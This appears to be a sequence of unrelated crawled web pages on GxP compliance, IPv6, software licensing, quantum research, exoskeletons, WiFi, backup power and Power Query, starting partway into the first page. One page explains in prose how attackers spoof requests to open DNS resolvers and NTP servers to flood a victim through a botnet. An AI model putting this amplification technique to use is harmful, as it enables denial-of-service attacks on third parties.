- Defining the DI requirements (e.g., ALCOA data attributes) during the lifecycle of data
- Identifying the risks and mitigation strategies (e.g., technical or procedural controls) to avoid DI breaches.
Who is impacted by GxP?
Regulated industries, including food, pharma, medical devices, and cosmetics, are impacted by GxP. GxP guidelines and regulations are global; some of the popular regulators include FDA in the US, TGA in Australia, and HS-SC in Canada. GxP includes varied regulation sets, but the most common are GCP, GLP and GMP:
GCP (Good Clinical Practice)
GCP is an international quality standard that is provided by the International Conference on Harmonisation (ICH), an international body that defines standards that governments can transpose into regulations for clinical trials involving human subjects. It controls experimentation on humans done for the sake of advancement in medical sciences and serves as a quality benchmark as well as a moderator that keeps such experimentation in check.
GLP (Good Laboratory Practice)
GLP is the nonclinical counterpart for GCP. These guidelines apply to nonclinical studies conducted for the assessment of the safety or efficacy of chemicals (including pharmaceuticals) to humans, animals and the environment.
GMP (Good Manufacturing Practice)
GMP consolidates the practices required to conform to the guidelines recommended by agencies that control authorization and licensing for the manufacture and sale of food, drug and active pharmaceutical products. These guidelines provide minimum requirements that a pharmaceutical or a food product manufacturer must meet to ensure that the products are of high quality and do not pose a risk to the consumer or public. Good manufacturing practices, along with good laboratory practices and good clinical practices are overseen by regulatory agencies in the United States, Canada, Europe, China and other countries. The most common GMP guidance documents are:
- EU Good Manufacturing Practice (GMP) Guidelines, Volume 4
- US FDA current Good Manufacturing Practice (cGMP) guidelines: 21 CFR Part 11, 210, 211 and 820
- WHO Good Manufacturing Practices for pharmaceutical products, Annex 4 to WHO Technical Report Series, No. 908, 2003
Monitoring simplified Using the ClearDATA dashboard for GxP
With healthcare transformation moving at a rapid pace, compliance and security monitoring across the healthcare enterprise is a major HIT challenge. ClearDATA Compliance and Security Dashboard simplifies adherence to administrative, physical and technical safeguards.
Our dashboard is mapped directly to HIPAA, FDA, and GDPR guidelines. It can be enabled across different cloud environments and can easily monitor thousands of components, providing unique individual asset scorecards as well as a wide variety of additional reports.
Sample Key scorecard metrics and features:
Validate that your storage medium is successfully encrypted to ensure compliance for FDA—21 CFR Part 11.30.
Login and log monitoring
Quickly identify and mitigate the risk of unauthorized system access to ensure compliance for FDA—21 CFR Part 11.10(g).
Securely retain six years of access logs with automated validation to ensure compliance for FDA—21 CFR Part 11.10 (e).
Patch level reporting
Receive notifications when new patches become available and quickly track previous updates to ensure compliance for FDA—21 CFR Part 820.30(i).
Partial GxP readiness checklist
Partner with a healthcare expert/managed service provider to address the following items:
- Define Quality System Regulation (QSR) gaps
- If applicable, discuss how to perform a Computer System Validation (CSV)
- Ensure that the following controls and procedures are implemented:
- Backup and recovery
- Contingency plan
- Disaster recovery
- Change control management
- Configuration management
- Error handling
- Maintenance and support
- Corrective measures
- System access
Prepare for your GxP Validation Process:
- Decide which GxP guidelines apply to you
- Decide how your technology maps to GxP guidelines
- Define user requirements
- What are your user needs?
- Functional specifications
- What will be automated?
- Solution analysis
- Validation of your system
- Build and construction
- System detailed design specifications
- System test procedures
- Quality review
- Data migration (legacy systems)
- Roles and responsibilities
- Pharmaceutical Computer Systems Validation: Quality Assurance, Risk Management and Regulatory Compliance, 2016
| <urn:uuid:22976ef2-6e4b-4b09-8bba-dd8faa9eeff3> | CC-MAIN-2022-40 | https://www.cleardata.com/platform-services/gxp-regulations/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00119.warc.gz | en | 0.894613 | 1,363 | 2.84375 | 3 |
IPv6 isn’t the new kid on the block, by any means. In fact, the “new” protocol has been ready for deployment since 1998 – but if the switch to v6 is as inevitable and urgent as we’ve been told, then why are we still using IPv4 technology nearly twenty years later?
The truth is this: Yes, we have been faced with the limitations of IPv4 addressing for many years, and yes, it is becoming increasingly urgent that we make the shift to IPv6 before we run out of v4 address spaces. In fact, the only reason this hasn’t already happened is thanks to technologies such as Network Address Translation (NAT) that allow several devices to share the same public IPv4 address. But with the growth of the Internet of Things (IoT), the globalised culture of the internet, and Bring Your Own Device (BYOD) office environments, the shift to IPv6 has taken on new urgency.
This article will take a look at some Network Architecture concerns in light of the imminent shift to IPv6.
This time, the shift to IPv6 is really happening
At this point, you’d be forgiven for thinking that the IPv4/IPv6 crisis is the contemporary equivalent of the Y2K bug scare: a looming date at which the internet will mysteriously cease working, all because we didn’t get our act together in time. This is, of course, not the case. But there are some very real concerns about moving to IPv6, not least of which is the dramatic increase in address usage with the implementation of IoT technology and the continued growth of the internet around the globe. According to this article on InternetSociety.org, Apple is shifting to an exclusively IPv6 Network Architecture with the upcoming release of iOS 9. The reason for the move is that more and more carriers around the world are switching to IPv6-only addressing – meaning that any applications that don’t work on IPv6 will simply not be able to function for those networks, and, as a result, those customers. It’s clear that many other major players in the field are coming to the same conclusion, as everyone from Google, to Facebook, to Cisco, to AT&T have already geared their networks for permanent IPv6 functionality.
How will Network Architecture be affected by IPv6?
The most obvious feature of IPv6 is its dramatically increased addressing space over IPv4. While IPv4 can address up to 4 billion devices (without the help of address translating technology), IPv6 uses a much larger, hexadecimal-notated address space, resulting in a number of addresses so large it defies human comprehension. But another departure from IPv4 methodology is that IPv6 addresses are dynamic – an IPv6 host can generate its own address, check its availability, and use it if it is available. This is due to the way IPv6 addresses are composed: the first 64 bits of the address specify the subnet prefix, while the last 64 bits specify the interface identifier – meaning that the interface identifier needs to be unique only within the subnet to which the host connects. This has numerous Network Architecture implications, including the fact that address management will be automated – to a certain extent. For applications that use hard-coded IP addresses, this could present a monumental problem, and engineers should be aware of the fundamental incompatibility of hard-coded IPs within the IPv6 framework.
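The prefix-plus-interface-identifier split can be seen with Python's ipaddress module. The sketch below builds a modified EUI-64 interface identifier from a MAC address and appends it to a documentation /64 prefix; note that modern hosts often use randomised or privacy identifiers instead, and the MAC shown is made up:

```python
import ipaddress

def eui64_interface_id(mac: str) -> int:
    """Build a modified EUI-64 interface identifier from a MAC address."""
    octets = [int(x, 16) for x in mac.split(":")]
    octets[0] ^= 0x02                                  # flip the universal/local bit
    eui = octets[:3] + [0xFF, 0xFE] + octets[3:]       # insert FF:FE in the middle
    return int.from_bytes(bytes(eui), "big")

prefix = ipaddress.IPv6Network("2001:db8:abcd:12::/64")   # first 64 bits: subnet prefix
iid = eui64_interface_id("00:1a:2b:3c:4d:5e")             # last 64 bits: interface identifier
address = ipaddress.IPv6Address(int(prefix.network_address) | iid)
print(address)   # 2001:db8:abcd:12:21a:2bff:fe3c:4d5e
```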
While many networks today use Dual Stack deployment models, the increase in demand on your network environment from using two separate addressing protocols, as well as the inherent limitations of IPv4, make this a counterproductive solution. IPv6 also includes built-in IPsec features, so overlaying security protocols on top of your IP is quite likely a thing of the past – IPsec is included as an optional header, so it is not hard-coded into the protocol, but incorporating security and encryption measures will be a far easier practice.
Being well-prepared is always the best defence
Although IPv6 has some radical implications for Network Architecture and app management, it’s important to return to the sentiment with which we started this article – IPv6 is, by no means, a brand-new technology. Its official launch was more than three years ago, and its inception happened nearly two decades in the past. With that in mind, sympathy can only be offered to a certain extent: we’ve all had ample warning that we’d be re-thinking our Network Architecture with the arrival of IPv6. For those who heeded the warnings in time, the transition to IPv6 could be a much smoother one, as changes to Network Architecture and capacity planning methods could easily have been made incrementally since the announcement of IPv6.
Shifting to IPv6 is no trivial matter, and the considerations to your Network Architecture will need to be thoroughly thought out. Partnering with a service provider that understands the importance of shifting to IPv6, and one that can provide you with the tools you need to make the transition as smooth as possible should be your first port of call. IRIS offers IP management tools that cater to both IPv4 and IPv6 frameworks, and have the expertise and experience to help you gear your network for the future. To find out more about what IRIS can offer you, please download a free trial of our software today.
Image credit: IBM Systems Mag | <urn:uuid:eed2e1fc-2c95-42d3-9fde-900fbae470b2> | CC-MAIN-2022-40 | https://irisns.com/2015/06/11/network-architecture-considerations-in-light-of-ipv6/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00119.warc.gz | en | 0.915416 | 1,357 | 2.515625 | 3 |
Open DNS resolvers will recursively query authoritative name servers on behalf of anyone who asks; in fact, a list of open resolvers can be found at http://openresolverproject.org/. Similarly, Network Time Protocol (NTP) servers with "monlist" enabled allow a host to request the last 600 addresses that connected to the server. Knowing this, an attacker (possibly using a bot) can send a DNS request whose source address is spoofed to be the IP address of the victim, and the open resolver will send all the responses to the victim. See the figure below for a pictorial description of this:
While this is a serious problem, what's worse is that an attacker could use not only one bot to attack the victim but rather an entire army of bots (making up a "botnet") to each individually attack the victim using this same method. The figure below shows this scenario:
The following screen capture shows two requests to the same open DNS resolver. The left capture shows the packets collapsed (payload hidden) while the right shows an expanded response. This shows the large amount of data that a single request can generate. An attacker can use this to overwhelm a victim. | <urn:uuid:c7c3496b-668c-4d8f-b2ae-23980058fa63> | CC-MAIN-2022-40 | https://community.f5.com/t5/technical-articles/abusing-open-resolvers/ta-p/280537 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00319.warc.gz | en | 0.908847 | 246 | 2.5625 | 3 |
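To put rough numbers on the amplification described in the open-resolver example above, here is a small back-of-the-envelope sketch; the byte counts and bot counts are hypothetical round figures, not measurements from the capture:

```python
# Rough illustration of DNS reflection/amplification arithmetic.
# All numbers below are invented round figures for illustration only.

query_size = 64          # bytes: a small spoofed DNS query
response_size = 3_000    # bytes: a large answer from an open resolver
bots = 10_000            # compromised hosts sending spoofed queries
queries_per_second = 100 # queries each bot sends per second

amplification = response_size / query_size
attacker_bytes = bots * queries_per_second * query_size
victim_bytes = bots * queries_per_second * response_size

print(f"amplification factor : {amplification:.0f}x")
print(f"attacker sends       : {attacker_bytes * 8 / 1e6:,.0f} Mbit/s")
print(f"victim receives      : {victim_bytes * 8 / 1e6:,.0f} Mbit/s")
```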
According to Wikipedia: “Software asset management (SAM) is a business practice that involves managing and optimizing the purchase, deployment, maintenance, utilization, and disposal of software applications within an organization.” But what does that really mean or look like in a practical sense? Software Asset Management is a vital process in any organization. Understanding how much software you own, which vendors you buy from, terms and conditions of the contracts you’ve signed with these vendors, program limitations, license entitlements and use rights, user needs vs. license installment, and accuracy of inventory are all essential functions of SAM.
For many organizations, SAM is a complex, unwieldy challenge, especially if the organization spans more than one location. Executing an effective SAM program is very difficult for most companies. A good Software Asset Management strategy is key to maintaining compliance and avoiding hefty true-up fees and other noncompliance costs. Companies who are found to be non-compliant with their licensing agreements can face massive fines, sometimes into the millions of dollars, or be subject to legal action.
What Are Software Licenses?
Software licenses are the agreements that allow a company or individual to use proprietary software owned by a vendor. Software License agreements dictate how and where businesses can deploy software, ranging from the operating systems on each computer throughout the organization, to the workplace software used on each machine/device, but may also include database servers and other back-end infrastructure. The licenses also address what sorts of tasks can be performed with the software, how the software is configured, and which features the organization is approved to use.
Staying in Compliance
Companies need to ensure that they purchase an appropriate number of licenses, either for the number of devices the software will be installed and used on, or for the number of people who will be using the software. Historically, we’ve seen two main ways that many companies rely on to try to mitigate their risk around compliance with their licensing: (1) choosing to over-license (the "better safe than sorry" practice), or (2) budgeting all year for eventual true-ups. Being out of compliance can result in the publisher of the software performing a Software Audit, which can result in massive fees for companies found to be missing licenses, plus the added disruption of having your software environment audited.
Over-licensing occurs when an organization purchases more licenses than they need for their environment. While this ensures that the organization will be compliant, the overspending of purchasing more licenses than required is a costly practice, especially when you consider that the licenses won’t be used. A solid SAM strategy will help to ensure that your company does not overpay in the long run by maintaining only the number of licenses necessary.
If a software publisher finds that you are out of compliance, a true-up will be necessary to settle the difference. Depending on the scale of non-compliance, true-ups can cost companies hundreds of thousands or even millions of dollars. Accurate inventory count, proper maintenance, and regular assessment of software asset requirements and use ensures that true-up costs don’t creep up on you too significantly and can help keep auditors at bay.
Part of having a strong Software Asset Management strategy is understanding how to re-negotiate license contracts. At the end of your software license contract term, you will be given the opportunity to re-negotiate with the vendor. When an organization enters into these negotiations with a current view of their software needs and use and a projected view of their future requirements, that information can be leveraged for better pricing and can help avoid unnecessary over-purchasing of new or unneeded licenses.
Staying in compliance may seem like a daunting task, but a strong Software Asset Management strategy can make compliance a much more manageable process. It may seem like the most prudent way to avoid true-up costs or an audit by a vendor would be to purchase more licenses than you need, but this comes with its own costs, especially over the long-term. Unless the organization is in a growth cycle where more employees will be brought on to consume those licenses before the next purchasing cycle, the money spent on over-purchasing licenses is wasted.
A good practice for maintaining compliance is to perform a Self-Assessment at least once a year. An organization is in its best position to make software license decisions when it has a full picture of its software environment.
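As a purely illustrative sketch of what such a self-assessment boils down to (reconciling entitlements against installations), consider the following; the product names and counts are invented:

```python
# Hypothetical self-assessment: compare license entitlements against installs.
entitlements = {"OfficeSuite": 500, "CADPro": 40, "DBServer": 12}
installed    = {"OfficeSuite": 463, "CADPro": 52, "DBServer": 12}

for product in sorted(set(entitlements) | set(installed)):
    owned = entitlements.get(product, 0)
    used = installed.get(product, 0)
    gap = owned - used
    if gap < 0:
        status = f"NON-COMPLIANT: {-gap} unlicensed installs (true-up risk)"
    elif gap > 0:
        status = f"over-licensed by {gap} seats (potential wasted spend)"
    else:
        status = "fully utilised"
    print(f"{product:12} owned={owned:4} installed={used:4} -> {status}")
```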
For more information about Software Asset Management as a whole, or any inquiries about Self-Assessments, we invite you to contact us with your questions. | <urn:uuid:719ad60d-d964-4689-9e0b-4d663d74dc7a> | CC-MAIN-2022-40 | https://metrixdata360.com/sam-series/what-is-software-asset-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00319.warc.gz | en | 0.939428 | 969 | 2.53125 | 3 |
Qubits in Hyperchaos a Breakthrough in Quantum Cryptography
(By Becky Bracken) As it stands, there isn’t enough computing power available to study large-scale quantum systems, like those required for quantum cryptography. A group of physicists have just published a paper on what they think is the solution: Hyperchaos Phenomenon.
“As full-scale quantum computing on a true quantum computer is not available yet, the bottleneck is that only small-scale quantum computers, up to dozens of qubits, can be simulated using classical supercomputers,” Dr. Weibin Li, from School of Physics and Astronomy, Nottingham University, who worked on the new research said.
Dr. Li joined a team assembled from Loughborough, Nottingham, and Innopolis universities, who report in their article, Emergence and control of complex behaviors in driven systems of interacting qubits with dissipation, that qubits excited by a laser eventually enter a state called "hyperchaos," which remains steady as the system is expanded.
Critically, the hyperchaos can be controlled and observed. The ability to control large-scale quantum systems could be a major advance in the race to create new quantum cryptography tools, the report said.
“Here, full control and characterization of quantum computers is the key to performing correct and massive computing,” Dr. Li added. “In the quantum realm, the number of degrees of freedom of a system grows exponentially with its size.”
Fellow author of the report Dr. Alexandre Zogoskin from Loughborough’s School of Science related the Hyperchaos Phenomenon finding to early airplane builders who didn’t have computers available for complex aerodynamics calculations but were still able to observe a smaller set of data to reach the goal of flight.
Orville and Wilbur Wright didn’t hold advanced degrees in engineering, after all.
“In order to design an aircraft, it is necessary to solve certain equations of hydro(aero)dynamics, which are very hard to solve and only became possible way after WWII, when powerful computers appeared,” Dr. Zogoskin said. “Nevertheless, people had been designing and flying aircraft long before that.”
The team is hoping by exciting qubits into hyperchaos the development of large-scale systems won’t be frustrated by a lack of computing power.
“Without this, direct simulation of a quantum system in all detail, using a classical computer, becomes impossible once it contains more than a few thousand qubits,” Dr. Zogoskin explained. “Essentially, there is not enough matter in the Universe to build a classical computer capable of dealing with the problem.”
The next step will be to build, and test scale models created from qubits excited into their hyperchaos state.
Dr. Zogoskin explained the discovery in sheer numbers, “If we can characterize different regimes of a 10,000-qubit quantum computer by just 10,000 such parameters instead of 2^(10000) – which is approximately 2 times a 1 with three thousand zeros – that would be a real breakthrough.” | <urn:uuid:ddc99a68-a51f-49c3-b309-23595667a109> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/qubits-in-hyperchaos-a-breakthrough-in-quantum-cryptography/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00319.warc.gz | en | 0.943711 | 674 | 3.25 | 3 |
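To see why Dr. Zogoskin's numbers rule out brute-force simulation, here is a small sketch of the memory a full state vector would need; it assumes one complex128 amplitude (16 bytes) per basis state, a common convention in simulators rather than a figure from the paper:

```python
# Memory needed to store the full state vector of an n-qubit system on a
# classical machine: 2**n complex amplitudes at 16 bytes each (complex128).
for n in (10, 30, 50, 300):
    amplitudes = 2 ** n
    bytes_needed = amplitudes * 16
    print(f"{n:4d} qubits -> 2^{n} amplitudes, about {bytes_needed:.3e} bytes")

# For comparison, the observable universe holds roughly 10**80 atoms, so a few
# hundred qubits already exceed any conceivable classical memory.
```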
July 17, 2018
One cannot begin a blog post talking about workplace safety without sharing some statistics: According to OSHA, there are more than 4,700 worker fatalities in the U.S. each year, and nearly three million work-related injuries and illnesses. U.S. employers spend $95 billion annually on workers’ compensation insurance, and shell out over $20 billion in workers’ comp fees. It’s not just about the money—injuries and illnesses hurt productivity, with employees having to miss work, restrict their activities, or even transfer jobs.
Those three million workers aren’t necessarily doing anything wrong. The work performed on construction sites and in factories is physically demanding. Over time, manual labor takes a toll on the human body, no matter one’s form while doing a task. So, it’s understandable that enterprises would be willing to spend a lot of money to augment human abilities with wearable robotics.
Exoskeletons are mechanical frames worn on the body to alleviate individuals’ physical burdens and enhance their abilities. There are full-body suits as well as partial exoskeletons like bionic arms and motor-assisted gloves. Exoskeletons can be powered (motorized) or not, but the idea is to make it physically easier for workers to do their jobs. (Exoskeleton technology originated in the military defense sector and has proved useful for assisting the physically disabled, paralyzed, and elderly.)
Exoskeletons are an ideal solution for addressing repetitive stress and overexertion injuries, the most common and expensive types of workplace injuries stemming from doing the same motion repeatedly; or from pulling, lifting, pushing, holding or carrying with improper technique or great strain on the job. Exoskeleton technology can make these activities easier by taking pressure off workers’ muscles and nerves, and preventing them from compromising their form. With greater ease comes the ability to work faster and get more done, and of course less risk of injury.
While there are many prototypes and even working exoskeletons currently in production, only a small number of these superhuman suits have been deployed in real industrial work environments. Interest is growing, however, among major enterprises in a range of industries and verticals. The following companies are either developing or testing exoskeleton technology today:
In 2017, the home improvement retailer set up a 3-month trial in one of its Virginia stores, where four employees wore non-motorized exoskeletons to lift objects and stock shelves.
Lowe’s workers can spend up to 90% of their time moving and lifting heavy items like bags of cement and buckets of paint. Looking to make the workday easier for employees, Lowe’s partnered with Virginia Tech to develop a simple exoskeleton. They came up with a harness-like device with carbon fiber rods that act as artificial tendons; bending with the user and storing energy as he goes to pick up an object, and releasing that energy back into the user’s back and legs when he stands up.
Lowe’s also had the employees involved in the trial wear a headset that senses brain activity, revealing whether the wearer enjoyed using the exoskeleton or not. Direct feedback from employees was positive—workers found the tech to be helpful and comfortable enough to wear all day. Lowe’s also believes the technology could be a selling point in recruiting new employees.
The Korean automaker has been building a line of robotic human exoskeletons to supplement or augment the abilities of manual laborers and help paraplegics walk again. One of the exoskeleton models, the Hyundai Universal Medical Assist or HUMA, is designed to aid every limb, supporting up to 88 pounds of a user’s weight. The suit can help fully mobile users lift heavier objects than normal and run at speeds up to 7.5 mph. Another suit, the H-Wex (Hyundai Waist Exoskeleton), is more of a safety device, designed to reduce the toll of repetitive motions originating from the waist. By giving auto workers, for example, more lifting power or just helping them endure long periods on their feet, the H-Wex can prevent back injuries and fatigue.
Daewoo Shipbuilding and Marine Engineering (DSME)
Exoskeletons can reduce the physical stress of everyday activities by diverting or absorbing the forces that normally affect the body, and they can also endow users with superhuman abilities like the strength to carry loads not normally manageable by a single human being. That is what attracted Daewoo to the technology several years ago: The Korean shipbuilder, maker of some of the world’s largest vessels, showcased its first prototype exoskeleton in 2013.
Made of aluminum alloy, carbon and steel, DSME’s exoskeleton weighs about 60 pounds but is entirely self-supporting, enabling users to lift heavy metal objects up to 66 pounds and still walk at a regular pace. The device is powered, with a three-hour battery life, and supports accessories for specific tasks (like a small attachable crane.) In testing, shipyard workers have generally approved of the technology, which is continually being improved in an effort to achieve a target lifting capacity of 220 pounds.
From full-on robosuits to robotic limbs: In 2016, Airbus revealed a strap-on mechanical arm intended to help assembly line workers execute heavy lifting with ease, even perform superhuman feats like machining parts of a jet hundreds of times a shift.
Airbus’ “third arm” exoskeleton assists workers in its Hamburg plant in using heavy drilling devices—they’re able to drill the 600 holes needed for each wing of an aircraft faster and be more comfortable. The technology cuts down on the costs of building airliners and keeps older workers in employment by increasing their strength.
The multinational corporation believes technologies like exoskeletons, smart glasses and 3D printing will be key in the production of Airbus aircrafts going forward and to achieving the goal of doubling the current output of its A320 aircraft.
The exoskeleton devices mentioned thus far have been prototypes developed in-house, in use by those organizations or not yet for sale. But there are companies that design and sell exoskeletons for industrial use. Ekso Bionics, for instance, has a few enterprise products: The EksoZeroG, a bionic arm that has appeared on construction sites, and the EksoVest, an upper body device for tasks above chest height.
Swiss firm Noonee’s Chairless Chair is popular among automotive companies, including BMW and Audi. In automotive assembly, workers often have to work in unnatural positions (e.g., overhead or under a vehicle), which can lead to serious health issues, as can spending much of the day alternately standing and bending. Noonee’s wearable ergonomic chair allows the wearer to essentially sit in midair and still walk around freely. The device supports Audi factory workers when they bend or lift, helping their body posture, preventing strain and eliminating the fatigue of standing.
As in the aerospace industry, exoskeleton technology can provide better working conditions for an aging automotive workforce.
Lockheed Martin is serious about human augmentation. Though the technology is still in the early adopter phase, Lockheed has an industrial production line: The Fortis exoskeleton is an unpowered, lightweight suit developed for environments like shipyards and heavy construction sites.
The Fortis Tool Arm is available as a separate product, a partial exoskeleton that transfers the weight, vibration and torque of holding industrial power tools from the operator’s body to the ground, making the tools feel weightless. Users, who commonly work overhead or on vertical surfaces, can produce higher quality work with less risk of muscle fatigue and musculoskeletal injury.
There is also the computer-controlled Fortis Knee Stress Release Device (K-SRD), which reduces the energy soldiers need to cross terrain, kneel for long periods of time, and climb with heavy loads.
With exoskeletons, you get the best of both worlds: The superior strength of a robot combined with a human’s ability to reason, adapt, innovate and improvise. Human workers are not in competition with automation and robotics. The best enterprise IoT ecosystems don’t pit the two against one another but rather use emerging technologies like robotics to assist, relieve, empower and safeguard real workers. | <urn:uuid:23908327-ac27-4934-8621-5837b5a4dd03> | CC-MAIN-2022-40 | https://www.brainxchange.com/blog/practical-fantasy-real-companies-exploring-exoskeletons | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00319.warc.gz | en | 0.939396 | 1,772 | 2.8125 | 3 |
What we think of as "slow internet" can sometimes be a weak WiFi signal. Wireless speeds tend to be less than wired speeds on the same network, due to interference and signal loss over distance. But there are ways you can make sure your WiFi is running as fast as possible.
Optimize your router. See #1 above.
Reduce interference from other electronics. Other devices in your home can slow down your WiFi connection, including microwaves, cordless phones, Bluetooth devices, TVs, wireless security systems, baby monitors, garage door openers, and more. If you have a newer modem, opt for a 5 GHz frequency signal to get a stronger connection and avoid some congestion from surrounding devices, many of which use the 2.4 GHz band. | <urn:uuid:0a156499-97dd-452c-8cb9-4be124e0b4e0> | CC-MAIN-2022-40 | https://www.centurylink.com/home/help/internet/troubleshoot-slow-internet.html?utm_source=Blog&utm_medium=Content&utm_content=what-are-data-caps | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00319.warc.gz | en | 0.943533 | 154 | 2.578125 | 3 |
Facilities that need to have backup power in the case of emergency, like hospitals or telecom service providers, have to stay on top of making sure their backup batteries are ready to go. There are a number of adverse conditions that can cause facilities to need to use emergency power backup, including power outages, surges, blackouts, and more.
If there was a power outage and a facility’s backup batteries are dead, that means the backup power doesn’t kick on. For certain agencies and facilities, that could be a life-and-death situation. For others, that could be a data loss that feels life-or-death.
There are several options for emergency power backup, including lithium-ion uninterruptible power supply (UPS) systems, standby commercial generators, and lead-acid battery UPS systems.
Most emergency backup power systems are currently built with lead-acid batteries, but there are some definite disadvantages to those, including space requirements, maintenance and battery longevity. Agencies and businesses that rely on uninterruptible power supply systems are increasingly looking for ways to lower their cost while simultaneously lowering their size, weight, and cooling requirements.
Lithium-ion Uninterruptible Power Supply Systems
Lithium-ion UPS have some striking advantages in the battery backup race. In comparison to lead-acid batteries, these batteries often have a higher specific energy/energy density, a longer lifespan, a quicker recharge time, and the ability to carry out more charge/discharge cycles (as many as two or three times more cycles than a lead-acid, depending on the chemical composition of the battery).
Li-ion battery UPS can last three times as long as lead-acid battery UPS.
Lithium batteries take up much less space than traditional lead-acid batteries, meaning a lithium-ion UPS could take up 80 percent less floor space than a conventional model.
There are currently some disadvantages to lithium-ion battery systems. They are more expensive, though as technology advances, prices are falling. They are also more difficult to recycle than other batteries, as most recycling centers don’t currently accept them.
Standby Commercial Generators
Standby commercial generators are one of the main types of generators people think of when they think of emergency power options. Standby commercial generators are built into a facility and use natural gas to power the building in lieu of electricity from the source.
Standby commercial generators have some advantages in the emergency power market. Because they are already built into the facility, there is zero setup time. They kick on as soon as the power shuts off. Because they’re ensconced in the facility and operate using natural gas, they are robust systems that can work in extreme weather.
A standby commercial generator may not be the best option for a business, especially one with a smaller budget or one that needs to be mobile. Standby commercial generators require the installation of natural gas pipes and can’t be moved. Also, because of the nature of the system, it can be more expensive to install than other UPSs.
Lead-acid Battery Uninterruptible Power Supply Systems
Lead-acid batteries are regarded as the conventional and dependable UPS battery solution because they have been used for decades in UPS applications. Because they are so often used, they are also less expensive than other options. Lead-acid batteries are easily recyclable as well.
Lead-acid batteries must be replaced two to three times as often as lithium-ion batteries. They take up much more space than lithium-ion batteries, making them less appealing for mobile applications. They also don’t perform as well as lithium batteries. They take longer to charge as well.
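To make the replacement-cost trade-off concrete, here is a rough back-of-the-envelope sketch; the prices and lifespans are hypothetical round numbers, not vendor quotes:

```python
# Back-of-the-envelope battery replacement cost over a UPS's service life.
# All figures below are invented for illustration.
SERVICE_LIFE_YEARS = 15

options = {
    # name: (battery string price in USD, expected battery life in years)
    "lead-acid":   (2_000, 5),
    "lithium-ion": (4_500, 15),
}

for name, (price, life) in options.items():
    sets_purchased = -(-SERVICE_LIFE_YEARS // life)  # ceiling division
    total = sets_purchased * price
    print(f"{name:12} {sets_purchased} battery sets over "
          f"{SERVICE_LIFE_YEARS} years -> ${total:,}")
```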
Lithium-ion Uninterruptible Power Supply Systems are a compact, long-lasting, and quicker-charging alternative to other UPS options. Prevent catastrophe with a lithium-ion UPS | <urn:uuid:65ab8a66-ad28-4df3-9f44-bb3faed43f00> | CC-MAIN-2022-40 | https://www.hcienergy.com/blog/emergency-backup-power-options-available-for-commercial-and-remote-applications | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00319.warc.gz | en | 0.956492 | 825 | 3.0625 | 3 |
July 25, 2022
Difference Between Power Pivot, Power Query and Power BI
December 3, 2019
The terms “Power Query,” “Power Pivot,” “Power BI,” and other “Power” names appear more and more often in articles and materials about Microsoft Excel. Not everyone clearly understands what is behind these concepts, how they are interrelated, and how they can help an ordinary Excel user. Let’s clarify the situation.
What is Power Query, Power Pivot, Power BI, and Why do you Need Them?
Power Query is a self-service ETL (Extract, Transform, Load) tool that works as an Excel add-in. It allows users to extract data from different sources, manipulate that data into a form that matches their needs, and load it into Excel. Back in 2013, a dedicated group of developers inside Microsoft released a free Power Query add-in for Excel (also known as Data Explorer and, later, Get & Transform), which can do a lot of useful things for everyday work:
- Download data into Excel from almost 40 different sources, including databases (SQL Server, Oracle, Access, Teradata), corporate ERP systems (SAP, Microsoft Dynamics), internet services (Facebook, Google Analytics), and almost any website.
- Collect data from files of all the basic types (XLSX, TXT, CSV, JSON, HTML), either one at a time or in bulk from all the files in a specified folder. From Excel workbooks, you can automatically load data from all sheets at once.
- Clean the data of “garbage”: extra columns or rows, duplicates, service information in the “header,” extra spaces or non-printing characters, and so on.
- Put data in order: fix case and numbers-stored-as-text, fill in blanks, add a proper table header, split text that is stuck together into columns and merge it back, break data into its components, and so on.
- Transform tables in every way, bringing them into the desired shape (filter, sort, change the order of columns, transpose, add totals, unpivot cross-tables into flat ones and pivot them back).
- Substitute data from one table into another by matching one or several columns, i.e., a perfect replacement for the VLOOKUP function and its analogs.
Power Query is found in two versions: as a separate add-in for Excel, which can be downloaded from the official Microsoft website and as part of Excel 2016. In the first case, a separate tab appears in Excel after installation. In Excel 2016, all the Power Query functionality is already built-in by default and is located on the Data tab as a group of Get and Transform.
The functionality is completely identical no matter which way you obtain it. The principal feature of Power Query is that all actions for importing and transforming data are stored in the form of a query – a sequence of steps written in the internal Power Query programming language, which is succinctly called “M.” The steps can always be edited and replayed any number of times (refreshing the query).
Of everything listed in this article, this is the most useful add-in for the widest range of users. There are a lot of tasks that previously required either contorted formulas or macros – now they are done easily and elegantly in Power Query, with results that can be refreshed automatically. And given that it is free, Power Query is simply unbeatable on value and an absolute must-have for any reasonably advanced Excel user these days.
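Power Query records its steps in the M language inside Excel, so there is no Python involved; purely as an illustration of the same extract-clean-combine workflow, here is a rough pandas sketch (the folder name and the "amount" column are hypothetical):

```python
# A rough pandas analogue of a typical Power Query routine: load every CSV in
# a folder, clean it up, and combine the results. Names are hypothetical.
from pathlib import Path
import pandas as pd

frames = []
for path in Path("monthly_reports").glob("*.csv"):        # extract: all files in a folder
    df = pd.read_csv(path)
    df.columns = [c.strip().lower() for c in df.columns]  # tidy headers
    df = df.dropna(how="all").drop_duplicates()           # drop empty rows and repeats
    df["amount"] = pd.to_numeric(df["amount"], errors="coerce")  # fix number-as-text
    df["source_file"] = path.name                         # keep lineage
    frames.append(df)

combined = pd.concat(frames, ignore_index=True)           # load: one combined table
print(combined.head())
```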
